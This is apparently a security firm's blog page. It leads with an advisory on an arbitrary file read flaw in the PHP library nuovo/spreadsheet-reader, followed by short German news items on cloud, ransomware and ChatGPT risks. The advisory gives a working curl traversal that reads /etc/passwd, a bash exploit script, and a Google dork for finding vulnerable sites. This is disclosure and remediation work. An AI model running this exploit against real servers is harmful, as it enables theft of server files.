Kategorie: Allgemein | Seite 3 | HiSolutions Research

13. Januar 20234. Januar 2024Advisories, Allgemein, Penetrationstest, Schwachstelle

Arbitrary File Read vulnerability – PHP library nuovo/spreadsheet-reader 0.5.11

Within the scope of a penetration test HiSolutions‘ security consultants discovered an arbitrary file read vulnerability in the spreadsheet-reader library by nuovo. The vulnerability was reported before by another security researcher on 17th Dec 2020 but does not have gotten any attention by the author since. After unsuccessful attempts to contact the author via different channels, HiSolutions decided to release exploit details without further actions. The vulnerability affects the current version 0.5.11 which is the latest version since 2015. It may affects earlier versions as well.

Update: As of April 2023, this vulnerability was assigned CVE-2023-29887.

Background Information

The spreadsheet-reader library by nouvo is a widely used PHP software which is used to read out XLS, XLSX, ODS and variously separated text files. The project is hosted on Github and got a decent number of 660 stars and 494 forks. Furthermore it is listed on Packagist, a known PHP package repository, and was downloaded over 500.000 times. Using dependency managers like composer, the vulnerable library obviously found its way into various PHP websites (see Google dork in section “impact” for more information).

The vulnerability

The software ships with a “test.php” file located in the root-directory if the project. The PHP file can be called with the parameter “File” via HTTP GET. Due to the lack of security checks arbitrary paths can be passed as a value for the File parameter:

curl http://127.0.0.1/vendor/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd

As a result from the request above, the contents of the etc/passwd file get returned as a nested PHP array:

---------------------------------
Starting memory: 670416
---------------------------------
---------------------------------
Spreadsheets:
Array
(
    [0] => passwd
)
---------------------------------
---------------------------------
---------------------------------
*** Sheet passwd ***
---------------------------------
0: Array
(
    [0] => root:x:0:0:root:/root:/bin/bash
)
Memory: 3000 current, 719760 base
---------------------------------
1: Array
(
    [0] => bin:x:1:1:bin:/bin:/sbin/nologin
)
Memory: 3232 current, 719992 base
---------------------------------
2: Array
(
    [0] => daemon:x:2:2:daemon:/sbin:/sbin/nologin
)
Memory: 3224 current, 719984 base
---------------------------------
3: Array
(
    [0] => adm:x:3:4:adm:/var/adm:/sbin/nologin
)

[...]

To display only the actual file content and filter out the “noise” around the output, use the following script:

#!/bin/bash

## usage:
# $ spreadsheet-reader-exploit.sh URL FILEPATH
# $ http://127.0.0.1/vendor/nuovo/spreadsheet-reader ../../../../../../../../../../../etc/passwd

SPREADSHEET_FOLDER_URI=$1
FILEPATH=$2
TMP=/tmp/spreadsheesh.txt

curl -s "${SPREADSHEET_FOLDER_URI}/test.php?File=${FILEPATH}" -o ${TMP}
cat ${TMP} | grep ] | cut -d ">" -f 2- | grep -v '^[[:space:]]*$'

Impact

The vulnerability is trivial to exploit. Attackers are able to read arbitrary files from the servers file system with the privileges of the PHP process.

The following google dork shows that multiple websites are online, using the vulnerable composer package:

inurl:"/nuovo/spreadsheet-reader" (Link)

Remediation

As a quick fix the test.php file should be deleted. This would stop attackers to exploit the vulnerability using the default file.

Nevertheless, the vulnerability is not limited to the default test.php file. The root cause of the problem is that the application itself does not sanitize or normalize the passed path-parameter when reading out files from the file system. Therefore, your software must sanitize the path manually before passing it to the library.

Since the project has not received any updates since 2015, despite many open Github (security) issues, it can be assumed that it is not under active development anymore. Therefore, we recommend to use an alternative library.

Responsible Disclosure Timeline

17.12.2020 – The user “liquidsec” first reported an arbitrary read vulnerability discovered in a penetration test.
30.03.2022 – Independent discovery of the vulnerability by HiSolutions within the scope of a penetration test.
since 29.04.2022 – HiSolutions contacted the author through Github, Facebook and LinkedIn.
13.01.2023 – Since the author did not respond to any of the messages, HiSolutions decided to disclose the exploitation details.

Credits

The vulnerability was found by Ronny Dobra (HiSolutions AG).

12. Januar 202312. Januar 2023Allgemein, Malware, Security Engineering

Vom Berater bis zum Angreifer: Computer übernehmen die Jobs

Ende November gab die Firma OpenAI den Prototypen ihres Chatbots ChatGPT zum Ausprobieren durch die Community frei und die nutzte die Adventszeit für viele spannende und teils erschreckende Experimente. Was ist ChatGPT eigentlich? Tatsächlich, wie der Name sagt, ein Chatbot, den man mit Fragen zu recht komplexen Antworten bringen kann. Wie in einem Fachgespräch üblich, kann man ihn durch weitere Fragen oder Änderungswünsche die Antworten ergänzen und verbessern lassen. Der Chatbot kann nicht nur Texte schreiben, sondern auch einfache Programme entwickeln.

Vorsicht ist jedoch angesagt, damit der Bot seine Ergebnisse nicht zu sehr nach den vermeintlichen Wünschen des Fragestellers ausrichtet. Bei Tests mit typischen Beratungsfragen, also den Fragen, die ohne Kontext immer mit „Es kommt darauf an“ beantwortet werden, konnte ChatPGT sehr überzeugend beide Sichten begründen – allerdings ohne auf die jeweils andere Option einzugehen. Fragt man beispielsweise, wie mit schwachen SSL-Cipher-Einstellungen umgegangen werden soll, bekommt man je nach Fragestellung diese Antworten:

Für die Einordnung der Ergebnisse der künstlichen Intelligenz ist dann doch wieder Fachwissen nötig.

ChatGPT kann aus einer kurzen Beschreibung heraus auch ein passendes Programm entwickeln. Das interessiert natürlich auch potenzielle Malware-Autoren. Die Kollegen von Check-Point haben in Foren erste Hinweise in Foren gefunden, dass mit Malware aus ChatGPT-generiertem Code experimentiert wurde. Ob sich das Entwicklungsmodell bei den Malware-Autoren durchsetzt oder diese Malware am Ende sogar leichter erkennbar sind, wird die Zukunft zeigen.

https://www.heise.de/news/ChatGPT-Maechtige-Waffe-in-Haenden-von-Skriptkiddies-7452741.html

30. Juni 2022Allgemein, News

ReinRaaSig: Ransomware as a Service in Azure

„Die Cloud“ gilt gemeinhin als etwas Ransomware-sicherer als On-Prem-Infrastrukturen, allein schon, weil Backup und Restore häufig als native Operationen zur Verfügung stehen. Nun hat sich herausgestellt, dass bestimmte Sicherheitsfeatures der Cloud verwendet werden können, um Angreifern die erpresserische Verschlüsselung sogar zu erleichtern.

Mit Funktionen wie Auto Save lassen sich in M365 bzw. SharePoint Online eine bestimmte konfigurierbare Anzahl alter Versionen einer Datei behalten – zunächst einmal ein Sicherheitsgewinn. Und mit geeigneten Zugriffsrechten können Angreifer auch nicht direkt diese früheren Versionen manipulieren. Es genügt jedoch, wenn sie entweder eine große Anzahl verschlüsselter Versionen einer Datei erzeugen, um alle Versions-Slots zu überschreiben, oder aber das „Versionslimit“ auf 1 setzen – dann genügen zwei Speichervorgänge, um alle unverschlüsselten Kopien zu tilgen.

Microsoft beteuert zwar, auch „überschriebene“ Versionen seien innerhalb von 14 Tagen mithilfe des Supports wiederherstellbar, dies konnte jedoch in der Praxis nicht bestätigt werden.

A Microsoft 365 feature can ransom files on SharePoint and OneDriveCould

30. Juni 2022Allgemein, News

Sonnenstürme in den Wolken – Droht die Cloud-Komplexität zu eskalieren?

In nur sechs Monaten, von August 2021 bis Januar 2022, wurden acht kritische Schwachstellen bei großen Cloud-Anbietern entdeckt – davon sechs allein bei Azure und zwei bei AWS. Das ergibt zumindest die Auswertung des Security-Forschers Scott Piper, der eine umfassende Liste solcher Lücken pflegt. Da Schwachstellen in Infrastrukturen in der Regel keine CVE-Nummern erhalten und somit von den Herstellern oder den Entdeckerinnen und Entdeckern mit CVSS-Scores für die Kritikalität ausgewiesen werden, musste Piper die Einstufung dafür selbst vornehmen.

Zwar hatte „die Cloud“ noch nicht ihren SolarWinds-Moment wie die Supply-Chain-Security im Dezember 2020, als über die Backdoor Solorigate/Sunburst in der Management-Software SolarWinds Orion sehr viele Firmen weltweit auf einmal akut betroffen waren. Doch zeigt die Aufstellung, dass es bereits diverse near misses gab, in denen großer Schaden hätte angerichtet werden können, wären Angreifer schneller als die Researcher gewesen.

Dass Microsofts Cloud-Dienst so stark überproportional betroffen ist, dürfte eher daran liegen, dass sich der Fokus der Sicherheitsforschung insbesondere auch auf Azure ausgeweitet hat, da sich die Plattform gerade im Business-Umfeld einen gewissen Marktanteil hat sichern können: Allein zwischen 2019 und 2021 legte Azure von 16,5 % auf 20,8 % zu, während Marktführer AWS bei rund 35 % verharrte.

h ttps://www.protocol.com/enterprise/microsoft-azure-vulnerabilities-cloud-security

30. Juni 2022Allgemein, News

No Claim to Blame: Cloud-Kunden-Fails

Übrigens patzen nicht nur die Cloud-Anbieter, sondern auch die Cloud-Kunden. Hier gibt es eine Liste von Customer-seitigen AWS-Fails zum Zweck des „blameless postmortems“ (zu Deutsch etwa Ursachenanalyse ohne Schuldzuweisung): h ttps://github.com/ramimac/aws-customer-security-incidents

30. Juni 2022Allgemein, News

Elasticheimsuch: NoSQL-Datenbanken geransomed

Ransomware muss nicht unbedingt Clients oder Infrastrukturen befallen. Datenbanken können auch direkt heimgesucht werden, so wie im Fall von mindestens 1.200 Elasticsearch-Instanzen. Angreifer hatten über eine unsichere Konfiguration der Authentifizierung die Daten durch Erpresserbriefe ersetzt.

Elasticsearch ist nicht die erste „next generation“-Datenbank, die auf solche Weise heimgesucht wird. 2020 stellten Sicherheitsforschende fest, dass in ca. der Hälfte der damals exponierten MongoDB-Instanzen ebenfalls der Inhalt durch eine ähnliche Ransom-Note ersetzt worden war.

https://www.secureworks.com/blog/unsecured-elasticsearch-data-replaced-with-ransom-note

30. Juni 2022Allgemein, News

Angriff erkannt, Angriff gebannt? KRITIS-Orientierungshilfe zur Angriffserkennung

Nachdem das IT-Sicherheitsgesetz 2.0 insbesondere beim Thema Angriffserkennung den betroffenen Unternehmen neue Anforderungen bescherte, hat nun das BSI die einschlägige „Orientierungshilfe zum Einsatz von Systemen zur Angriffserkennung“ als Community Draft veröffentlicht.

Sie beschreibt Anforderungen an KRITIS- und Energieanlagen-Betreiber sowie prüfende Stellen.

Der Community Draft kann noch bis zum 8. Juli 2022 kommentiert werden.

Community Draft: https://www.bsi.bund.de/DE/Service-Navi/Presse/Alle-Meldungen-News/Meldungen/Orientierungshilfe_Angriffserkennung_220613.html

Darstellung des Inhalts: https://www.openkritis.de/massnahmen/angriffserkennung_kritis_siem_soc.html#orientierungshilfe

30. Juni 2022Allgemein, News

Kein LAPSus: LAPS wird nativ auf Windows

Die bei auf Security bedachten Admins beliebte Local Administrator Password Solution (LAPS) von Microsoft musste bisher als zusätzliches Dienstprogramm installiert werden. Mit der neuen Windows 11 Preview wird LAPS nun zum nativen Bestandteil des Betriebssystems. LAPS macht es deutlich leichter, die lokalen Account-Passwörter auf domänenverbundenen Computern sicher zu verwalten. Die Ausweitung auf Azure AD ist ebenfalls bereits angekündigt.

https://blogs.windows.com/windows-insider/2022/06/22/announcing-windows-11-insider-preview-build-25145/

30. Juni 2022Allgemein, News

Lesetipps Juni 2022

Abhängig

Der „Dependency Graph“ beschreibt alle unsere Abhängigkeiten – zumindest was unsere Software betrifft.

https://docs.github.com/en/code-security/supply-chain-security/understanding-your-software-supply-chain/about-the-dependency-graph

Wissbegierig

Nick Jones, Cloud Security Specialist bei WithSecure (bis vor Kurzem als F-Secure Business bekannt) weiß, welches Wissen sein Feld benötigt.

https://www.nojones.net/posts/breaking-into-cloudsec

Eingebettet

Cory Doctorow kennt alle Tricks, mit denen Backdoors in KI-Modelle eingeschleust werden können.

https://doctorow.medium.com/undetectable-backdoors-for-machine-learning-models-8df33d92da30

25. Mai 2022Allgemein, News

Eurovision Song CTF: Der hybride Krieg weitet sich aus

Im Medienrummel um den ukrainischen Triumph beim „ESC“, dem Eurovision Song Contest, ist weitgehend untergegangen, dass die IT-Infrastruktur des Festivals während der Show angegriffen wurde. Die prorussische Cybergruppierung Killnet hat versucht, die Abläufe zu stören und möglicherweise das Ergebnis zu verfälschen.

Da derartige Versuche erwartet wurden, konnten sie im laufenden Betrieb abgewehrt werden, sodass die Veranstaltung reibungslos über die Bühne gehen konnte. Trotzdem warnen Verfassungsschutzorganisationen weiterhin vor den Aktivitäten derartiger Gruppen auch in Deutschland, die das Ziel haben könnten, die öffentliche Meinung zu beeinflussen.

https://www1.wdr.de/fernsehen/aktuelle-stunde/alle-videos/video-angeklickt-der-hybride-krieg-weitet-sich-aus-100.html